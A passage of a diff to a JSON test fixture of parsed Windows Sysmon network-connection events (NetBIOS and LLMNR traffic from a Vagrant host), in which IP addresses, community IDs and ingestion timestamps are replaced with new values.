Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e16\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.250\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -8720,15 +8629,15 @@ }, "destination": { "port": 137, - "ip": "169.254.180.25" + "ip": "89.160.20.156" }, "source": { "port": 137, - "ip": "169.254.255.255" + "ip": "89.160.20.156" }, "network": { "protocol": "netbios-ns", - "community_id": "1:yP71IXofOTWmF1LG760//yXa4Rk=", + "community_id": "1:fbQ9BbXiy01VWluiIQp2GM9FUAU=", "transport": "udp", "type": "ipv4", "direction": "ingress" 
@@ -8742,14 +8651,13 @@ "SYSTEM" ], "ip": [ - "169.254.255.255", - "169.254.180.25" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741684400Z", + "ingested": "2021-12-09T13:50:23.457054Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e169.254.180.25\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e17\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", 
@@ -8826,7 +8734,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.741690900Z", + "ingested": "2021-12-09T13:50:23.457059800Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e18\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003efe80:0:0:0:616f:32fa:b04f:b419\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003eff02:0:0:0:0:0:1:3\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -8878,15 +8786,15 @@ }, "destination": { "port": 5355, - "ip": "e000:fc:0:0:0:0:0:0" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "source": { "port": 55717, - "ip": "a9fe:b419:0:0:f880:2301:e0:ffff" + "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "network": { "protocol": "llmnr", - "community_id": "1:SHkoHfPFDYWai8qQBwIiRxvCPZw=", + "community_id": "1:CbJTXAoYGQFCeKHghMVMZBaSXX0=", "transport": "udp", "type": "ipv6", "direction": "egress" 
@@ -8900,14 +8808,13 @@ "NETWORK SERVICE" ], "ip": [ - "a9fe:b419:0:0:f880:2301:e0:ffff", - "e000:fc:0:0:0:0:0:0" + "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741696500Z", + "ingested": "2021-12-09T13:50:23.457065600Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003ea9fe:b419:0:0:f880:2301:e0:ffff\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003ee000:fc:0:0:0:0:0:0\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e19\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.251\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-0bad-5c8c-0000-0010dfbc0000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e924\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\svchost.exe\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\NETWORK SERVICE\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='SourceHostname'\u003e\u003c/Data\u003e\u003cData 
Name='SourcePort'\u003e55717\u003c/Data\u003e\u003cData Name='SourcePortName'\u003e\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003etrue\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e5355\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003ellmnr\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", @@ -8956,7 +8863,7 @@ }, "destination": { "port": 137, - "ip": "40.77.226.250" + "ip": "89.160.20.156" }, "source": { "port": 137, @@ -8965,7 +8872,7 @@ }, "network": { "protocol": "netbios-ns", - "community_id": "1:DI+g4BImhWaUwPmLEjdMMQVYPLs=", + "community_id": "1:W+rKY9g2gw/4oKxs1Chg32lzBig=", "transport": "udp", "type": "ipv4", "direction": "egress" 
@@ -8980,16 +8887,16 @@ ], "ip": [ "10.0.2.15", - "40.77.226.250" + "89.160.20.156" ] }, "host": { "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:23:14.741703800Z", + "ingested": "2021-12-09T13:50:23.457071500Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e40.77.226.250\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e20\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.264\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData 
Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e89.160.20.156\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-03-18T16:57:49.340Z", 
@@ -9069,7 +8976,7 @@ "name": "vagrant-2012-r2" }, "event": { - "ingested": "2021-06-14T13:23:14.741712900Z", + "ingested": "2021-12-09T13:50:23.457077300Z", "code": "3", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:49.340580700Z'/\u003e\u003cEventRecordID\u003e21\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:48.276\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='DestinationIp'\u003e10.0.2.3\u003c/Data\u003e\u003cData 
Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -9120,7 +9027,7 @@ }, "destination": { "port": 137, - "ip": "169.254.255.255" + "ip": "89.160.20.156" }, "source": { "port": 137, @@ -9129,7 +9036,7 @@ }, "network": { "protocol": "netbios-ns", - "community_id": "1:ZHyFuF2PjubLSbAh4zRQIZHOZK8=", + "community_id": "1:W+rKY9g2gw/4oKxs1Chg32lzBig=", "transport": "udp", "type": "ipv4", "direction": "egress" 
@@ -9144,13 +9051,13 @@ ], "ip": [ "10.0.2.15", - "169.254.255.255" + "89.160.20.156" ] }, "event": { - "ingested": "2021-06-14T13:23:14.741719600Z", + "ingested": "2021-12-09T13:50:23.457083100Z", "code": "3", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData Name='SourceHostname'\u003evagrant-2012-r2.local.crowbird.com\u003c/Data\u003e\u003cData Name='SourcePort'\u003e137\u003c/Data\u003e\u003cData Name='SourcePortName'\u003enetbios-ns\u003c/Data\u003e\u003cData Name='DestinationIsIpv6'\u003efalse\u003c/Data\u003e\u003cData 
Name='DestinationIp'\u003e169.254.255.255\u003c/Data\u003e\u003cData Name='DestinationHostname'\u003e\u003c/Data\u003e\u003cData Name='DestinationPort'\u003e137\u003c/Data\u003e\u003cData Name='DestinationPortName'\u003enetbios-ns\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e3\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e3\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:50.357238700Z'/\u003e\u003cEventRecordID\u003e22\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4492'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:49.213\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-6e19-5c8c-0000-0010eb030000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4\u003c/Data\u003e\u003cData Name='Image'\u003eSystem\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Protocol'\u003eudp\u003c/Data\u003e\u003cData Name='Initiated'\u003etrue\u003c/Data\u003e\u003cData Name='SourceIsIpv6'\u003efalse\u003c/Data\u003e\u003cData Name='SourceIp'\u003e10.0.2.15\u003c/Data\u003e\u003cData 